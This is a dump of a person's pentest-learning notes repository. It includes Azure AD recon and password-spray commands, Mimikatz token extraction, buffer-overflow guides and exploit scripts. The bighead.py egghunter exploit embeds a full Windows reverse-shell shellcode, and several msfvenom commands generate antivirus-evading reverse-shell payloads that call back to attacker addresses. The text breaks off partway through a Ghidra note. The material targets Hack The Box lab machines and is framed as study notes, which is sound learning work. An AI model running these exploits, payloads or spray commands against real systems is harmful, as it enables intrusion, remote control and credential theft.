├── LICENSE ├── README.md ├── azure_ad ├── azurehound.txt ├── enumeration.txt ├── initial_access.txt ├── post_exploitation.txt └── recon.txt ├── binary_exploitation ├── buffer_overflow │ ├── egg_hunting │ │ ├── bighead.py │ │ ├── info.txt │ │ └── vulnserver.py │ ├── immunityDbg.txt │ ├── linux │ │ ├── guide.txt │ │ ├── htbNodeOverflow.py │ │ └── htbOctoberOverflow.py │ ├── msfvenom.txt │ ├── nasmShell.txt │ ├── patternCreate.txt │ ├── patternOffset.txt │ ├── remote_overflow.py │ ├── remote_overflow.txt │ ├── rop.txt │ └── windows │ │ └── slMail.txt └── reverse_engineering │ ├── gdb.txt │ ├── ghidra.txt │ ├── radare2.txt │ └── recon.txt ├── bruteforce ├── 7zCrack.sh ├── fcrackzip.txt ├── generateWordlist.txt ├── hashcat.txt ├── hydra.txt ├── john.txt ├── openssl.txt ├── padbusterCookie.txt ├── password-spray.txt ├── patator.txt ├── pdfCrack.txt └── rdp.txt ├── certificates ├── generateCA.txt └── openssl.txt ├── databases ├── nosql │ └── mongo │ │ └── mongo.txt └── sql │ ├── blindSqli.py │ ├── blindSqli.txt │ ├── mssql │ ├── mssql.txt │ ├── mssqlclient.txt │ └── sqsh.txt │ ├── mysql.txt │ ├── oracle │ ├── cli.txt │ ├── odat.txt │ ├── oscanner.txt │ ├── sqlplus.txt │ └── tnscmd.txt │ ├── postgresqlCli.txt │ ├── sqli.txt │ └── sqlmap.txt ├── defense_evasion └── amsi │ ├── AmsiInitFailed.ps1 │ ├── AmsiPatchInMemory.ps1 │ └── OverwriteAmsiContext.ps1 ├── development ├── cross-compile.txt └── nasm.txt ├── file_inclusion ├── lfi.txt └── uploadFile.txt ├── filetransfer ├── base64.txt ├── dev_tcp.txt ├── ftp_commands.txt ├── ftp_server.txt ├── http_server.txt ├── nc.txt ├── nginx_file_transfer.txt ├── nginx_setup.txt ├── rsync.txt ├── scp.txt ├── smb.txt ├── smb_server.py └── windows │ ├── tftp.txt │ ├── vbs.txt │ ├── web_request.txt │ ├── webrequest.txt │ ├── wget.txt │ └── winrm.txt ├── forensics ├── convert.txt ├── dit.txt ├── luks_encrypted.txt └── volatility.txt ├── git └── git.txt ├── google_dorks └── dorks.txt ├── infrastructure ├── linux.txt └── windows.txt ├── ldap ├── blind_ldap_injection.txt └── recon.txt ├── mail ├── imap │ └── imapCurl.txt ├── sendemail.txt └── smtp │ └── smtp.txt ├── metasploit └── metasploit.txt ├── networking ├── firewall.txt ├── iptables.txt ├── netdiscover.txt ├── packets │ ├── capturePackets.py │ ├── icmpReadFile.txt │ └── sniffPackets.py ├── route.txt ├── tcpdump.txt └── vm_bridge.txt ├── nfs ├── mountShares.txt └── showmount.txt ├── package_injection └── package_injection.txt ├── persistence ├── linux │ ├── ssh.txt │ └── techniques.txt └── windows │ ├── schtasks.txt │ └── wmi.txt ├── pivoting ├── chisel.txt ├── meterpreter.txt ├── ncat.txt ├── portForwarding.txt ├── socat.txt ├── ssh.txt ├── sshuttle.txt └── windows │ ├── netsh.txt │ ├── plink.txt │ └── wmic.txt ├── port_knocking └── portKnock.txt ├── post_exploitation └── windows │ ├── com_hijack.txt │ ├── disable_monitoring.txt │ ├── fgdump.txt │ ├── mimikatz.txt │ └── schtasks.txt ├── privesc ├── linux │ └── find-suid.txt └── windows │ ├── hashdump.txt │ ├── sherlock.txt │ └── unquoted-service-paths.txt ├── recon ├── curl.txt ├── dns.txt ├── droopescan.txt ├── enum4linux.txt ├── gobuster.txt ├── iis_shortname.txt ├── masscan.txt ├── nbtscan.txt ├── ncat.txt ├── netstat.txt ├── nikto.txt ├── nmap.txt ├── onesixtyone.txt ├── openvas.txt ├── password_gathering.txt ├── recon-ng.txt ├── reconsteps.txt ├── smtp_enum.txt ├── snmpwalk.txt ├── theharvester.txt ├── usernames.txt ├── webdav.txt ├── wfuzz.txt └── wpscan.txt ├── remote_connection ├── ftp.txt ├── psExec.txt ├── psRemoting.txt ├── pth-winexe.txt ├── remote_desktop.txt ├── scp.txt ├── ssh.txt ├── telnet.txt ├── winrm.rb ├── winrm.txt └── winrm_cert.rb ├── restricted_shell └── methods.txt ├── reverse_shell ├── interactive_shell.txt └── msfvenom.txt ├── scripts ├── assembly2shellcode.sh ├── blind_nosqli.py ├── blind_sqli.py ├── byte_order_converter.py ├── checkPort.py ├── convert_to_vbs.py ├── decryptRSA.py ├── ipScan.sh ├── iraw2png.pl ├── pingNetwork.py ├── pingNetwork.sh ├── portscan.py ├── portscan.sh ├── printAllAscii.py ├── printAllAscii.sh ├── psMonitor.sh ├── setuid.c ├── smbver.sh ├── smtpVrfyUserList.py ├── smtpVrfyUsers.py ├── socketShell.py ├── split_binary.sh ├── subnetscan.ps1 ├── subnetscan.sh └── zonetransfer.sh ├── smb ├── mount_shares.txt ├── rpcclient.txt ├── setup.txt ├── smb_relay.txt ├── smb_scf.txt ├── smbclient.txt ├── smbmap.txt └── version.txt ├── tokens └── jwt.txt └── windows ├── active_directory ├── asreproasting.txt ├── bloodhound.txt ├── constrained_delegation.txt ├── getDomainController.txt ├── group_policy_objects.txt ├── kerberoasting.txt ├── powerview.txt ├── recon.txt ├── rubeus.txt ├── tickets.txt ├── unconstrained_delegation.txt └── writeDACL.txt ├── ads.txt ├── base64.txt ├── check_antivirus.txt ├── check_architecture.txt ├── check_services.txt ├── constrained_powershell_bypass.txt ├── crackmapexec.txt ├── create_account.txt ├── download.txt ├── dpapi.txt ├── enable_rdp.txt ├── file_permissions.txt ├── get_os.txt ├── llmnr.txt ├── mssql.txt ├── pass_the_hash.txt ├── powershell_language_mode.txt ├── prompt_credentials.txt ├── putty.txt ├── rdesktop.txt ├── reg_query.txt ├── rlwrap.txt ├── runas.txt └── switch_user.txt /README.md: -------------------------------------------------------------------------------- 1 | Here are all my personal notes I made during my pentest learning experience since the very beginning. 2 | ===================================================================================================== 3 | -------------------------------------------------------------------------------- /azure_ad/azurehound.txt: -------------------------------------------------------------------------------- 1 | Azurehound is Bloodhound's Azure and Azure AD attack path mapper. 2 | 3 | Use Azurehound to map out the Azure infrastructure: 4 | Step 1: Azurehound uses both Azure AD as well as Az Powershell, so we need to connect both 5 | syntax : $passwd = ConvertTo-SecureString "" -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential("@", $passwd); Connect-AzureAD -Credential $creds; Connect-AzAccount -Credential $creds 6 | example: $passwd = ConvertTo-SecureString "S3cureP@ss!" -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential("hr@ecorp.com", $passwd); Connect-AzureAD -Credential $creds; Connect-AzAccount -Cred 7 | ential $creds 8 | 9 | Step 2: Import Azurehound and let the dog loose 10 | example: Import-Module C:\Tools\Azurehound\Azurehound.ps1 11 | Invoke-AzureHound -verbose 12 | Step 3: Open Bloodhound and drop the resulting zip folder in there 13 | -------------------------------------------------------------------------------- /azure_ad/initial_access.txt: -------------------------------------------------------------------------------- 1 | Inspired by Pentester Academy - Attacking and Defending Azure Active Directory 2 | Ways to get initial access into Azure Active Directory: 3 | 4 | Password spray on previously enumerated email accounts: 5 | Step 1: clone https://github.com/dafthack/MSOLSpray 6 | Step 2: import module into Powershell session 7 | example: Import-Module C:\Tools\MSOLSpray\MSOLSpray.ps1 8 | Step 3: 9 | syntax : Invoke-MSOLSpray -UserList -Password -Verbose 10 | example: Invoke-MSOLSpray -UserList emails.txt -Password 'Sup3rS3cureP@ss!' -Verbose 11 | 12 | 13 | -------------------------------------------------------------------------------- /azure_ad/post_exploitation.txt: -------------------------------------------------------------------------------- 1 | Commands to use after exploiting an Azure AD-joined machine: 2 | 3 | Mimikatz: 4 | Extract Primary Refresh Token, session key, tenant ID: 5 | example: mimikatz "privilege::debug" "sekurlsa::cloudap" exit 6 | 7 | Extract context key and derived key (use session key from sekurlsa::cloudap command): 8 | syntax : mimikatz "privilege::debug" "token::elevate" "dpapi::cloudapkd /keyvalue: /unprotect" exit 9 | example: mimikatz "privilege::debug" "token::elevate" "dpapi::cloudapkd /keyvalue:"AQAAA..." /unprotect" exit 10 | -------------------------------------------------------------------------------- /azure_ad/recon.txt: -------------------------------------------------------------------------------- 1 | Inspired by Pentester Academy - Attacking and Defending Azure Active Directory 2 | Numerous commands to do OSINT recon on Azure Active Directory (Most, if not all tools listed here are in Powershell): 3 | 4 | Check if an Azure Tenant exists and if it does, get information about it: 5 | syntax : https://login.microsoftonline.com/getuserrealm.srf?login=@&xml=1 6 | example: https://login.microsoftonline.com/getuserrealm.srf?login=non-existent@ecorp.com&xml=1 7 | 8 | Get the tenant ID: 9 | syntax : https://login.microsoftonline.com//.well-known/openid-configuration 10 | example: https://login.microsoftonline.com/ecorp.com/.well-known/openid-configuration 11 | 12 | Gather information using AADInternals: 13 | Step 1: clone https://github.com/Gerenios/AADInternals 14 | Step 2: import the module in your Powershell session 15 | example: Import-Module C:\Tools\AADInternals\AADInternals.psd1 16 | Step 3: use the tool 17 | Get information about the tenant and check validity of username 18 | syntax : Get-AADIntLoginInformation -UserName @ 19 | example: Get-AADIntLoginInformation -UserName admin@ecorp.com 20 | 21 | Get the tenant domains: 22 | syntax : Get-AADIntTenantDomains -Domain 23 | example: Get-AADIntTenantDomains -Domain ecorp.com 24 | 25 | Get some general public information we can gather about a tenant 26 | syntax : Invoke-AADIntReconAsOutsider -Domain 27 | example: Invoke-AADIntReconAsOutsider -Domain ecorp.com 28 | 29 | Enumerate email addresses: 30 | Step 1: clone https://github.com/LMGsec/o365creeper 31 | Step 2: 32 | syntax : python.exe C:\Tools\o365creeper\o365creeper.py -f -o 33 | example: python.exe C:\Tools\o365creeper\o365creeper.py -f emails.txt -o valid.txt 34 | 35 | Enumerate Azure Services: 36 | Step 1: clone https://github.com/NetSPI/MicroBurst 37 | Step 2: import the module in your Powershell session 38 | example: Import-Module C:\Tools\MicroBurst\MicroBurst.psm1 39 | Step 3: use the tool 40 | Enumerate subdomains for an organization: 41 | syntax : Invoke-EnumerateAzureSubDomains -Base -Verbose 42 | example: Invoke-EnumerateAzureSubDomains -Base ecorp -Verbose 43 | -------------------------------------------------------------------------------- /binary_exploitation/buffer_overflow/egg_hunting/bighead.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # This script is taken from Ippsec's Bighead video (https://www.youtube.com/watch?v=VBt-CmjMYiM) 4 | # The egghunter might take a while to find the actual shellcode (could take 5-10 mins) 5 | 6 | import requests 7 | 8 | rhost = 'dev.bighead.htb' 9 | rport = '80' 10 | url = 'http://' + rhost + ':' + rport 11 | 12 | jmp_esp = '\xf0\x12\x50\x62' # 0x625012f0 13 | jmp_eax = '\xf2\x12\x50\x62' # 0x625012f2 14 | 15 | # The egghunter will look through the target machine's memory for 'w00tw00t', then when it finds it, 16 | # it executes the shellcode that comes after it 17 | egghunter = '' 18 | egghunter += '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74' 19 | egghunter += '\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7' 20 | 21 | # a 'nopsled' the size of 'EIP overwrite' ("A"*72) divided by 2, because it's two characters 22 | nopsled = '\x90' * (72 / 2) 23 | 24 | # Windows stageless reverse shell payload 25 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.123 LPORT=443 -f python -v shellcode 26 | shellcode = "w00tw00t" # This is what the egghunter will look for, then it will execute the shellcode after it 27 | shellcode += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64" 28 | shellcode += "\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28" 29 | shellcode += "\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c" 30 | shellcode += "\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52" 31 | shellcode += "\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" 32 | shellcode += "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49" 33 | shellcode += "\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" 34 | shellcode += "\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75" 35 | shellcode += "\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b" 36 | shellcode += "\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" 37 | shellcode += "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a" 38 | shellcode += "\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77" 39 | shellcode += "\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" 40 | shellcode += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" 41 | shellcode += "\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68" 42 | shellcode += "\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x0a" 43 | shellcode += "\x0e\x09\x68\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56" 44 | shellcode += "\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c" 45 | shellcode += "\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5" 46 | shellcode += "\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6" 47 | shellcode += "\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01" 48 | shellcode += "\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56" 49 | shellcode += "\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" 50 | shellcode += "\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08" 51 | shellcode += "\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6" 52 | shellcode += "\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0" 53 | shellcode += "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" 54 | 55 | payload = (nopsled + jmp_esp + egghunter).encode('hex') 56 | 57 | #fuzz = '' 58 | #fuzz += 'A' * (72 - 8) 59 | #fuzz += 'B' * 8 60 | #fuzz += 'C' * 8 61 | #fuzz += 'D' * 80 62 | 63 | # print payload 64 | 65 | # Spray the shellcode, then the egghunter can look for it 66 | for i in range(0, 5): 67 | print 'Spray ' + str(i) 68 | requests.post(url, data=shellcode) 69 | ### 70 | 71 | # With this proxy, we can intercept the outgoing http request with burp and remove 72 | # stuff that might take up our buffer space 73 | proxy = {'http':'127.0.0.1:8080'} 74 | 75 | print 'Sending payload...' 76 | r = requests.head(url + '/' + payload, proxies=proxy) 77 | print payload 78 | print r.text 79 | 80 | -------------------------------------------------------------------------------- /binary_exploitation/buffer_overflow/egg_hunting/info.txt: -------------------------------------------------------------------------------- 1 | info about egghunting: https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/ 2 | ippsec bighead video : https://www.youtube.com/watch?v=VBt-CmjMYiM 3 | 4 | If you are doing binary exploitation and the target buffer size is too small for your whole payload, you will want to use an egghunter. 5 | 6 | 7 | Find egg via mona in immunity debugger: 8 | 9 | # "w00tw00t" is a common string used as an egg (deadbeef aswell) 10 | syntax : !mona find -type asc -s "" 11 | example: !mona find -type asc -s "w00t" 12 | 13 | Create egghunter via mona in immunity debugger: 14 | 15 | # If your egg is "w00tw00t", it suffices to only specify "w00t" 16 | syntax : !mona egg -t "" 17 | example: !mona egg -t "w00t" 18 | -------------------------------------------------------------------------------- /binary_exploitation/buffer_overflow/immunityDbg.txt: -------------------------------------------------------------------------------- 1 | Immunity debugger is used when you have to analyze a running process 2 | 3 | Setting up immunity debugger: 4 | 5 | Step 1 : Run immunity as administrator 6 | Step 2 : File -> attach -> attach the process you need 7 | Step 3 : Press play to run the program (top left somewhere) 8 | Optional: Change appearance 9 | 10 | 11 | Setting up mona (https://github.com/corelan/mona): 12 | 13 | (from the github page) 14 | Step 1 : Drag 'mona.py' into the 'PyCommands' folder inside the 'Immunity Debugger' application folder 15 | (C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands) 16 | 17 | Step 2 : Install Python 2.7.14 (or a higher 2.7.xx version) into c:\python27, thus overwriting the version 18 | that was bundled with Immunity. This is needed to avoid TLS issues when trying to update mona. 19 | 20 | 21 | Using immunity debugger: 22 | 23 | Place breakpoint: F2 24 | Follow expr : Click the right arrow pointing to the four vertical dots in the top bar (->:) and enter an address. 25 | 26 | 27 | Using Mona: 28 | 29 | Get modules : !mona modules 30 | Find jmp ESP: Go to executable modules list (click the 'e' at the top bar) 31 | Search cmds : 'Right click assembly pane -> search for -> command/sequence of commands' 32 | Check perms : Go to modules list (click on the 'm' at the top bar) 33 | Find opcode : !mona find -s "" -m # example: !mona find -s "\xff\xe4" -m slmfc.dll 34 | -------------------------------------------------------------------------------- /binary_exploitation/buffer_overflow/linux/guide.txt: -------------------------------------------------------------------------------- 1 | See the 'overflow.py' binary and Ippsec's 'Hackthebox October' video! (https://www.youtube.com/watch?v=K05mJazHhF4) 2 | 3 | Simplistic view of steps needed to do a buffer overflow attack (first get the binary over to your host machine or to a copy of the victim machine: 4 | 5 | Step 1: gdb ./ # example: gbd ./runme `python -c 'print "A"*200'` 6 | Step 2: b main 7 | Step 3: r (run) 8 | Step 4: c (continue) 9 | 10 | 11 | optionals : checksec (check security measures in place); si (switch to instructions); x/s 0x532b45 (check address); p system (get addr of system); searchmem /bin/sh (search for addr); disas main (disassemble main); 12 | get sys addr: readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system 13 | get /bin/sh : strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh 14 | 15 | check ASLR : ldd | grep libc # if memory address changes everytime, ASLR is enabled 16 | disable ASLR: sudo echo 0 > /proc/sys/kernel/randomize_va_space # disable ASLR, which randomizes libc memory address (requires root access) 17 | exploit dev : locate pattern_ # /usr/share/../../pattern_create.rb 18 | epxloit dev2: /usr/share/../../pattern_create.rb -l 200 # generates a string, run it with the binary in gdb and get the break address 19 | exploit dev3: /usr/share/../../pattern_offset.rb -q 62413762 # get offset of the memory address of the break caused by pat_create string (remove the 0x) 20 | -------------------------------------------------------------------------------- /binary_exploitation/buffer_overflow/linux/htbNodeOverflow.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # This is the finished overflow script we use on the binary on the target machine (Hackthebox Node) 3 | # Check Ippsec's 'Hackthebox October' video 4 | 5 | from subprocess import call 6 | import struct 7 | 8 | binaryLoc = "/usr/local/bin/backup" 9 | arg1 = "randomText" 10 | key = "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474" 11 | 12 | libcBaseAddr = 0xf75b0000 #libc address 'ldd /home/user/binary | grep libc' 13 | 14 | systemOffset = 0x0003a940 # system address 'readelf -s /lib32/libc.so.6 | grep system' 15 | exitOffset = 0x0002e7d0 # also from 'readelf -s ... | grep exit 16 | argShOffset = 0x00015900b # /bin/sh 'strings -a -t x /lib32/libc.so.6 | grep /bin/sh' 17 | 18 | # ' --platform -p LHOST= LPORT= -f -o 4 | example: msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.12.15.117 LPORT=6697 -f exe -o venom.exe 5 | 6 | 7 | Generate encoded reverse shell payloads to bypass antivirus and exclude bad characters: 8 | 9 | syntax : msfvenom -a --platform -p LHOST= LPORT= -e -b '' -f -v 10 | example: msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.0.124 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f python -v shellcode 11 | example: msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.0.124 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' EXITFUNC=thread -f python -v shellcode 12 | # EXITFUNC=thread is for remote BOF, when you close your reverse shell session, the target program won't crash 13 | 14 | example: msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.0.124 LPORT=4444 -e x86/shikata_ga_nai -i 9 -b '\x00\x0a\x0d' EXITFUNC=thread -f python -v shellcode 15 | # The -i tag specifies how many times the file should be encoded 16 | -------------------------------------------------------------------------------- /binary_exploitation/buffer_overflow/nasmShell.txt: -------------------------------------------------------------------------------- 1 | Use nasm_shell to find the opcode equivalent to 'JMP ESP': 2 | 3 | Step 1: /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb 4 | Step 2: Type in the instruction and grab the opcode (jmp esp -> FFE4) 5 | -------------------------------------------------------------------------------- /binary_exploitation/buffer_overflow/patternCreate.txt: -------------------------------------------------------------------------------- 1 | Create a unique string buffer so we can see at what exact buffer length the target program crashes: 2 | 3 | syntax : /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 4 | example: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1500 5 | -------------------------------------------------------------------------------- /binary_exploitation/buffer_overflow/patternOffset.txt: -------------------------------------------------------------------------------- 1 | Crash the target application with the 'pattern_create' pattern, then copy the value at the EIP register to get the exact offset: 2 | 3 | syntax : /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 4 | example: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 41414244 5 | -------------------------------------------------------------------------------- /binary_exploitation/buffer_overflow/remote_overflow.txt: -------------------------------------------------------------------------------- 1 | Steps needed to trigger a remote buffer overflow (example used was SLMail_5.5.0 with immunity debugger)(See ~/KaliPentestCommands/BufferOverflow/immunityDbg.txt) 2 | 3 | Step 1 : Recreate the service on a virtual machine with the same OS version as the target's machine. 4 | Step 2 : Fuzz the service (~/KaliPentestCommands/BufferOverflow/remote_overflow.py). 5 | Step 3 : Use pattern_create and pattern_offset to find the exact location of the crash (take the 'EIP' value after the crash and use it with 'pattern_offset.rb'). 6 | Step 4 : Append characters after a string buffer of that offset size and check the EIP if those characters are correct, then append more to see if they allocate memory. 7 | Step 5 : Right click 'ESP' -> 'Follow in dump' to see memory. 8 | Step 5 : Find bad characters using my 'remote_overflow.py' script. 9 | Step 6 : Edit the badchars list in the 'remote_overflow.py' script and redo the script everytime (save the badchars and remove them from the list). 10 | You can find bad chars by doing 'follow dump' on 'ESP' and checking the hex dumps '01 02 03 FE' or something similar means that '0x04' is a bad character. 11 | Repeat this until the hex dump lists all the characters in the 'badchars' list. 12 | 13 | Step 7 : Use mona to find modules with ASLR and DEP disabled, the module's memory range shouldn't contain any bad characters. (addresses you use for this part should never contain bad characters) 14 | (!p mona modules) 15 | Step 8 : Once you have found this module, go to the 'executable modules list' (e), then look for the module you found in step 7 and double-click on it 16 | Step 9 : Right click the assembly pane -> 'search for -> command -> "jmp esp"' (if not found, 'search for -> sequence of commands -> "push esp \n retn"')(the \n is an actual newline) 17 | Step 10: Go to 'modules list' (m) to check permissions 18 | Step 11: Find opcode equivalent to 'jmp esp' by using '/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb' with 'jmp esp' -> result: FFE4 19 | Step 12: Search for the opcode with mona command: !mona find -s "" -m # example: !mona find -s "\xff\xe4" -m slmfc.dll 20 | Step 13: Look for an address with no bad characters and verify that it contains a 'jmp esp' instruction by clicking on the top bar '->:' button and enter the found address. 21 | Check the instruction for 'jmp esp' 22 | 23 | Step 14: Add that address to your script's buffer where the address will overwrite EIP so that it will point to 'jmp esp'. This will eventually lead us to executing our shellcode. 24 | You have to reverse the address (x86 little endian format) and convert it to shellcode (5F4A358F -> \x8f\x35\x4a\x5f), then after the address, add more buffer chars> 25 | Python example: buffer = "A"*2606 + \x8f\x35\x4a\x5f + "C"*(3500-2610) 26 | 27 | Step 15: Restart immunity and slmail, place a breakpoint on that found address (->:) and run the exploit again 28 | Step 16: Generate shellcode, while avoiding bad characters 29 | # msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.0.124 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' EXITFUNC=thread -f python -v shellcode 30 | 31 | Step 17: Use this payload after the 'jmp esp' payload (maybe add a few 'nopsled(\x90)' chars) and add padding at the end 32 | 33 | Examples of finished exploit script: 34 | 35 | python pop3exploit.py 192.168.0.117 110 36 | 37 | python pop3exploit.py 192.168.0.117 110 2700 38 | 39 | python pop3exploit.py pattern 192.168.0.117 110 `python -c 'print "A"*2606 + "\x8f\x35\x4a\x5f" + "C"*(3500-2610)'` 40 | 41 | python pop3exploit.py badchars 192.168.0.117 110 `python -c 'print "A"*2606 + "B"*4'` 42 | 43 | python pop3exploit.py shellcode 192.168.0.117 110 `python -c 'print "A"*2606 + "\x8f\x35\x4a\x5f" + "\x90"*20'` `python -c 'print "C"*(3500-2606-10-341)'` 44 | -------------------------------------------------------------------------------- /binary_exploitation/buffer_overflow/rop.txt: -------------------------------------------------------------------------------- 1 | Useful stuff to know for exploiting binaries using ROP chains 2 | 3 | Stack frame: 4 | A stack frame with stack canary protection looks like this: 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | x86 assembly: 17 | Arguments to functions are passed directly onto the stack in x86 architecture. 18 | 19 | x86_64 assembly: 20 | Arguments to functions are passed into RDI (arg1), RSI (arg2), RDX (arg3), RCX (arg4), R8 (arg5), R9 (arg6). 21 | If there are more than 6 arguments for a function call, the rest of the arguments are pushed directly on the stack. 22 | -------------------------------------------------------------------------------- /binary_exploitation/buffer_overflow/windows/slMail.txt: -------------------------------------------------------------------------------- 1 | Install SLMail 5.5 from this link: 2 | 3 | https://www.exploit-db.com/apps/12f1ab027e5374587e7e998c00682c5d-SLMail55_4433.exe 4 | Just click 'next' everywhere for the install 5 | 6 | 7 | Setup SLMail to be exploited: 8 | 9 | Step 1: open port 110 by adding new inbound/outbound rules or shut down firewall entirely 10 | Step 2: run 'slmail configuration' as administrator 11 | Step 3: run 'immunity debugger' as administrator 12 | Step 4: attach the slmail process to immunity with 'File -> Attach' 13 | Step 5: start the slmail with the 'play' button 14 | Step 6: run exploit 15 | Step 7: restart slmail service via config panel when needed 16 | 17 | -------------------------------------------------------------------------------- /binary_exploitation/reverse_engineering/gdb.txt: -------------------------------------------------------------------------------- 1 | Very handy gdb cheatsheet: http://users.ece.utexas.edu/~adnan/gdb-refcard.pdf 2 | Simplistic view of steps needed to do a buffer overflow attack (first get the binary over to your host machine or to a copy of the victim machine: 3 | 4 | Step 1: gdb ./ 5 | Step 2: main 6 | Step 3: r (run) # example: gbd ./runme `python -c 'print "A"*200'` 7 | Step 4: c (continue) 8 | 9 | 10 | optionals : checksec; si (switch to instructions); x/s 0x532b45 (check address); p system (get addr of system); searchmem /bin/sh (search for addr); disas main (disassemble main); 11 | get sys addr: readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system; 12 | get /bin/sh : strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh 13 | 14 | check ASLR : ldd | grep libc # if memory address changes everytime, ASLR is enabled 15 | disable ASLR: sudo echo 0 > /proc/sys/kernel/randomize_va_space 16 | exploit dev : locate pattern # pattern_create.rb 17 | epxloit dev2: pattern_create.rb -l 200 # generates a string, run it with the binary in gdb and get the break address 18 | exploit dev3: pattern_offset.rb -q 62413762 # get offset of the memory address of the break caused by pat_create string (remove the 0x) 19 | 20 | 21 | Alternate debugging of a binary for a buffer overflow exploit (binary forks when it crashes): 22 | 23 | Step 1(term): ps -ef | grep 24 | Step 2(term): gdb --pid= 25 | Step 3(gdb) : show follow-fork-mode 26 | Step 4(gdb) : show detach-on-fork 27 | Step 4(gdb) : set detach-on-fork off 28 | Step 5(gdb) : fuzz the binary to check where it crashes 29 | Step 6(gdb) : x/10s and x/50s to see at what memory address the service crashes 30 | 31 | commands: 32 | info inferior : show info about parents/childs 33 | inferior : switch to node 34 | x/10s : check next 10 memory addresses after in string format 35 | x/10gx : check next 10 memory addresses after , use to see stack space for rop chains # send 200 characters, then do x/10gx $rsp to see how many are on the stack 36 | x/40s : check next 40 memory addresses after in hex format 37 | 38 | Common gdb commands: 39 | 40 | # run program 41 | example: run | r 42 | 43 | # display virtual memory space mapping 44 | example: vmmap 45 | example: vmmap libc 46 | 47 | # get all functions and their address 48 | example: info functions 49 | 50 | # get contents of all registers 51 | example: info registers 52 | 53 | # disassemble function 54 | syntax : disassemble 55 | example: disassemble main 56 | example: disas main 57 | 58 | # show contents of object 59 | syntax : print 60 | example: print $rbp 61 | example: print sayHello 62 | example: print *0x7f776589 63 | 64 | # examine memory locations (g = 8 bytes, w = 4 bytes, i = instructions) 65 | syntax : x/<#units> 66 | example: x/100gx $rsp 67 | example: x/20wx *0x7f776589 68 | example: x/5i $rip # show 5 next instructions from where rip is currently pointing 69 | 70 | # breakpoint at function 71 | syntax : break 72 | 73 | # set breakpoint at x space in function 74 | syntax : break *+ 75 | example: break *main+154 76 | 77 | # list and delete breakpoints 78 | Step 1 : info b -> check num 79 | Step 2 : del 80 | 81 | # step through debugger 82 | example: s 83 | # Step over function 84 | example: next 85 | # Finish current function 86 | example: finish 87 | 88 | # continue until next breakpoint 89 | example: c | continue 90 | -------------------------------------------------------------------------------- /binary_exploitation/reverse_engineering/ghidra.txt: -------------------------------------------------------------------------------- 1 | Ghidra is an open-source reverse engineering tool released by the NSA. 2 | 3 | To get started on debugging a binary: 4 | 5 | Step 1: File -> New Project -> Choose directory and project name 6 | Step 2: File -> Import File -> Select the binary to disassemble 7 | Step 3: Doubleclick the file to start debugging 8 | 9 | Rewrite (patch) instructions: 10 | # There is a bug in Ghidra, which causes a rewritten program to segfault when exported. Fix this by 